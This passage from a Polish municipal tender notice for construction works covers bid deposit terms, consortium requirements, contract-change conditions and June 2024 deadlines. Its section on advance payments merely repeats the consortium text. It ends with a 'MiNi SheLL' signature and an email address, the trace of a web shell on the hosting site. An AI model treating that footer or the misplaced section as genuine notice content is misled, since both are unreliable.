złożenia opisu rozwiązań równoważnych – jeżeli Wykonawca przewiduje ich zastosowanie (w przypadku, o którym mowa w Rozdziale 3 ust. 5 SWZ) oraz dokumenty na potwierdzenie równoważności zastosowanych rozwiązań (jeżeli są konieczne do wykazania równoważności). Brak dołączenia do oferty opisu rozwiązań równoważnych wraz z dokumentami potwierdzającymi, że spełniają one wymagania określone przez Zamawiającego oznaczać będzie, że Wykonawca przyjął rozwiązania wskazane w dokumentacji projektowej. W przypadku składania oferty wspólnej Wykonawcy składają wspólnie ww. dokumenty.<br/>2. Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych, o których mowa w pkt. 1, tj. opisu rozwiązań równoważnych oraz dokumentów na potwierdzenie równoważności zastosowanych rozwiązań (jeżeli są konieczne do wykazania równoważności).<br/>W przypadku składania oferty wspólnej Wykonawcy składają wspólnie ww. dokumenty. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.10.) Przedmiotowe środki dowodowe podlegające uzupełnieniu po złożeniu oferty: </h3> Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych, o których mowa w pkt. 1, tj. opisu rozwiązań równoważnych oraz dokumentów na potwierdzenie równoważności zastosowanych rozwiązań (jeżeli są konieczne do wykazania równoważności).<br/>W przypadku składania oferty wspólnej Wykonawcy składają wspólnie ww. dokumenty. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> Wykonawca zobowiązany jest do wniesienia wadium w wysokości 14 510,00 zł (słownie: czternaście tysięcy pięćset dziesięć 00/100 złotych).<br/>Wadium należy złożyć przed upływem terminu składania ofert. Decyduje data wpływu wadium do Zamawiającego.<br/>3.<br/>Wadium może być wnoszone w jednej lub kilku formach określonych w art. 97 ust. 7 P.z.p..<br/>4.<br/>Wadium wnoszone w pieniądzu wykonawca wpłaca przelewem na rachunek bankowy Zamawiającego nr 39 9375 1041 5500 0299 2000 0040, decyduje data wpływu środków do Zamawiającego.<br/>5.<br/>W przypadku, gdy Wykonawca wnosi wadium w formie gwarancji bankowej lub gwarancji ubezpieczeniowej z treści tych gwarancji musi w szczególności jednoznacznie wynikać:<br/>1)<br/>musi obejmować odpowiedzialność za wszystkie przypadki powodujące utratę wadium przez Wykonawcę określone w art. 98 ust. 6 p.z.p., bez potwierdzania tych okoliczności;<br/>2)<br/>z jej treści powinno jednoznacznie wynikać zobowiązanie gwaranta do zapłaty całej kwoty wadium;<br/>3)<br/>powinno być nieodwołalne i bezwarunkowe oraz płatne na pierwsze żądanie;<br/>4)<br/>termin obowiązywania poręczenia lub gwarancji nie może być krótszy niż termin związania ofertą;<br/>5)<br/>w treści poręczenia lub gwarancji powinna znaleźć się nazwa oraz numer przedmiotowego postępowania;<br/>6)<br/>beneficjentem poręczenia lub gwarancji jest: Gmina Chociwel, ul. Armii Krajowej 52, 73-120 Chociwel.<br/>6. W przypadku wnoszenia wadium w pieniądzu zaleca się, aby np. w tytule przelewu wyraźnie oznaczyć Wykonawcę wnoszącego wadium, szczególnie w przypadku gdy wadium jest wnoszone przez pełnomocnika/pośrednika.<br/>7. Zamawiający zaleca, aby w przypadku wniesienia wadium w formie pieniężnej – dowód dokonania przelewu został dołączony do oferty.<br/>8. Zasady zwrotu oraz okoliczności zatrzymania wadium określa art. 98 P.z.p.. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> W przypadku składania oferty przez Wykonawców wspólnie ubiegających<br/>się o udzielenie zamówienia (konsorcjum), Wykonawcy ustanawiają pełnomocnika<br/>do reprezentowania ich w postępowaniu albo do reprezentowania ich w postępowaniu<br/>i zawarcia umowy (lider konsorcjum). Pełnomocnikiem konsorcjum jest Wykonawca, który zaloguje się na swoim profilu<br/>Wykonawcy i składając ofertę w zakładce „Wykonawcy” doda pozostałych Wykonawców wpisując ich dane.<br/>2. W przypadku, gdy Wykonawca działa przez pełnomocnika, do oferty należy dołączyć stosowne pełnomocnictwo/a<br/>podpisane kwalifikowanym podpisem elektronicznym łącznie przez wszystkie osoby uprawnione do reprezentacji.<br/>3. Wykonawca może złożyć tylko jedną ofertę w niniejszym postępowaniu.<br/>4. Oferta musi być podpisana kwalifikowanym podpisem elektronicznym lub podpisem zaufanym lub podpisem osobistym<br/>przez osoby upoważnione do reprezentowania Wykonawcy (Wykonawców wspólnie ubiegających się o udzielenie<br/>zamówienia). Oznacza to, iż jeżeli z dokumentu(ów) określającego(ych) status prawny Wykonawcy(ów) lub pełnomocnictwa<br/>(pełnomocnictw) wynika, iż do reprezentowania Wykonawcy(ów) upoważnionych jest łącznie kilka osób, oferta oraz<br/>dokumenty<br/>i oświadczenia muszą być podpisane kwalifikowanym podpisem elektronicznym przez wszystkie te osoby.<br/>5. Jeżeli upoważnienie nie wynika wprost z dokumentu stwierdzającego status prawny Wykonawcy (odpisu z właściwego<br/>rejestru) do oferty należy dołączyć oryginał pełnomocnictwa wystawionego przez osoby do tego upoważnione, podpisanego<br/>kwalifikowanym podpisem elektronicznym (czyli opatrzonego podpisem kwalifikowanym) lub w postaci elektronicznej<br/>opatrzonej podpisem zaufanym<br/>lub podpisem osobistym. W przypadku, gdy dokumenty potwierdzające umocowanie<br/>do reprezentowania, zostały wystawione przez upoważnione podmioty jako dokument<br/>w postaci papierowej, przekazuje się cyfrowe odwzorowanie tego dokumentu opatrzone kwalifikowanym podpisem<br/>elektronicznym (czyli opatrzonej podpisem kwalifikowanym) lub w postaci elektronicznej opatrzonej podpisem zaufanym lub<br/>podpisem osobistym poświadczające zgodność cyfrowego odwzorowania z dokumentem w postaci papierowej.<br/>6. Wykonawca nie może wystąpić w innych ofertach jako Wykonawca lub Wykonawca wspólnie ubiegający się o udzielenie<br/>zamówienia.<br/>7. Wykonawca ponosi wszelkie koszty związane z przygotowaniem i złożeniem oferty.<br/>8. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie, z którego wynika, które<br/>roboty budowlane wykonają poszczególni Wykonawcy. Wzór oświadczenia stanowi załącznik nr 11 do SWZ. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.2.) Informacje na temat zaliczek: </h3> W przypadku składania oferty przez Wykonawców wspólnie ubiegających<br/>się o udzielenie zamówienia (konsorcjum), Wykonawcy ustanawiają pełnomocnika<br/>do reprezentowania ich w postępowaniu albo do reprezentowania ich w postępowaniu<br/>i zawarcia umowy (lider konsorcjum). Pełnomocnikiem konsorcjum jest Wykonawca, który zaloguje się na swoim profilu<br/>Wykonawcy i składając ofertę w zakładce „Wykonawcy” doda pozostałych Wykonawców wpisując ich dane.<br/>2. W przypadku, gdy Wykonawca działa przez pełnomocnika, do oferty należy dołączyć stosowne pełnomocnictwo/a<br/>podpisane kwalifikowanym podpisem elektronicznym łącznie przez wszystkie osoby uprawnione do reprezentacji.<br/>3. Wykonawca może złożyć tylko jedną ofertę w niniejszym postępowaniu.<br/>4. Oferta musi być podpisana kwalifikowanym podpisem elektronicznym lub podpisem zaufanym lub podpisem osobistym<br/>przez osoby upoważnione do reprezentowania Wykonawcy (Wykonawców wspólnie ubiegających się o udzielenie<br/>zamówienia). Oznacza to, iż jeżeli z dokumentu(ów) określającego(ych) status prawny Wykonawcy(ów) lub pełnomocnictwa<br/>(pełnomocnictw) wynika, iż do reprezentowania Wykonawcy(ów) upoważnionych jest łącznie kilka osób, oferta oraz<br/>dokumenty<br/>i oświadczenia muszą być podpisane kwalifikowanym podpisem elektronicznym przez wszystkie te osoby.<br/>5. Jeżeli upoważnienie nie wynika wprost z dokumentu stwierdzającego status prawny Wykonawcy (odpisu z właściwego<br/>rejestru) do oferty należy dołączyć oryginał pełnomocnictwa wystawionego przez osoby do tego upoważnione, podpisanego<br/>kwalifikowanym podpisem elektronicznym (czyli opatrzonego podpisem kwalifikowanym) lub w postaci elektronicznej<br/>opatrzonej podpisem zaufanym<br/>lub podpisem osobistym. W przypadku, gdy dokumenty potwierdzające umocowanie<br/>do reprezentowania, zostały wystawione przez upoważnione podmioty jako dokument<br/>w postaci papierowej, przekazuje się cyfrowe odwzorowanie tego dokumentu opatrzone kwalifikowanym podpisem<br/>elektronicznym (czyli opatrzonej podpisem kwalifikowanym) lub w postaci elektronicznej opatrzonej podpisem zaufanym lub<br/>podpisem osobistym poświadczające zgodność cyfrowego odwzorowania z dokumentem w postaci papierowej.<br/>6. Wykonawca nie może wystąpić w innych ofertach jako Wykonawca lub Wykonawca wspólnie ubiegający się o udzielenie<br/>zamówienia.<br/>7. Wykonawca ponosi wszelkie koszty związane z przygotowaniem i złożeniem oferty.<br/>8. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie, z którego wynika, które<br/>roboty budowlane wykonają poszczególni Wykonawcy. Wzór oświadczenia stanowi załącznik nr 11 do SWZ. <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zmiany treści umowy.<br/>1. Wykonawca nie wprowadzi jakichkolwiek zmian do Przedmiotu Umowy bez pisemnego polecenia Zamawiającego.<br/>2. Zamawiający przewiduje możliwość wprowadzania zmian do treści Umowy.<br/>3. Zmiany Umowy, w zakresie przedmiotu umowy lub terminu, będą mogły być wprowadzane w związku z zaistnieniem<br/>okoliczności, których wystąpienia Strony nie przewidywały w chwili zawierania Umowy. Okoliczności te nie mogą być<br/>wywołane przez którąkolwiek ze Stron, ani nie mogą być przez Strony zawinione i muszą wywoływać ten skutek, iż Umowa<br/>nie może być wykonana wedle pierwotnej treści, w szczególności z uwagi na rażącą stratę grożącą Stronom bądź jednej ze<br/>Stron lub niemożność osiągnięcia celu Umowy albo też wykonanie Umowy będzie istotnie utrudnione dla jednej bądź obu jej<br/>Stron. Okoliczności powyższe odnosić się mogą w szczególności do:<br/>1) wystąpienia robót dodatkowych bądź zamiennych<br/>2) wystąpienia zmian stanu prawnego, w tym w szczególności przepisów podatkowych, administracyjnych i z zakresu<br/>ochrony środowiska;<br/>3) działań i zaniechań organów władzy publicznej, przewlekłego załatwiania spraw przez organy władzy publicznej,<br/>4) działań i zaniechań instytucji polskich zaangażowanych w realizację, kontrolę<br/>lub finansowanie zamówienia;<br/>5) gwałtownej dekoniunktury, kryzysów finansowych w skali ponadpaństwowej;<br/>6) powszechnej niedostępności surowców bądź materiałów;<br/>7) konieczności uwzględnienia wpływu ewentualnych prac dodatkowych, robót zamiennych lub zmniejszenia zakresu robót<br/>zaistniałych w trakcie realizacji zadania;<br/>8) wystąpienia szczególnych warunków meteorologicznych, np. wystąpienia silnych wiatrów, opadów śniegu, ulewnych<br/>deszczy, nawałnic oraz ujemnych temperatur uniemożliwiających prowadzenie robót budowlanych, nieprzewidywalnych<br/>warunków gruntowych, klęsk żywiołowych lub ekologicznych bądź siły wyższej, np. powodzi, huraganu, nawałnic, trzęsienia<br/>ziemi, śnieżyc, strajków, ataków terrorystycznych w trakcie realizacji prac bądź wystąpienia skutków zachorowań na Covid-<br/>19 lub wprowadzonych z tego powodu ograniczeń, jeżeli będą miały bezpośredni wpływ na sposób i terminowość realizacji<br/>robót;<br/>9) innych nieprzewidywalnych sytuacji, w tym w szczególności kolizji z sieciami i obiektami podziemnymi lub innymi<br/>obiektami nieujętymi na mapach zasadniczych z państwowego zasobu geodezyjno – kartograficznego, warunkami<br/>nieopisanymi w dokumentacji projektowej, których nie dało się przewidzieć pomimo dochowania należytej staranności;<br/>10) konieczności uwzględnienia dodatkowych nieprzewidzianych opracowań projektowych, w tym wynikających z błędów<br/>projektanta ujawnionych w trakcie trwania kontraktu, a ściśle związanymi z kompleksową realizacją Przedmiotu Umowy;<br/>11) braku dostępu do mediów niezawinionego przez Wykonawcę (np. awarie w dostawie energii elektrycznej, wody czy<br/>innych mediów niezbędnych do wykonania Przedmiotu Umowy), proporcjonalnie o czas trwania awarii;<br/>12) rezygnacji przez Zamawiającego z realizacji części Przedmiotu Umowy jednak nie więcej niż o 30% wartości umowy<br/>brutto, w takim przypadku wynagrodzenie przysługujące Wykonawcy zostanie pomniejszone, przy czym Zamawiający<br/>zapłaci za wszystkie spełnione świadczenia oraz udokumentowane koszty, które Wykonawca poniósł w związku z<br/>wynikającymi z umowy planowanymi świadczeniami;<br/>13) jeżeli strony dopuściły zmianę terminu realizacji Przedmiotu Umowy dopuszczalna jest także zmiana postanowień<br/>Umowy obejmująca wydłużenie terminu ważności zabezpieczeń. Jeżeli strona trzecia, od której zależy przedłużenie<br/>ważności zabezpieczenia nie przedłużyła ważności zabezpieczenia w drodze aneksu, Wykonawca zobowiązany jest<br/>skorzystać z innych form zabezpieczenia.<br/>Szczegółowe zapisy dot. możliwości zmian treści umowy sa zawarte w zał. nr 7 w § 19 Zmiany treści umowy <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2024-06-26 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://oneplace.marketplanet.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2024-06-26 10:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2024-07-25</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com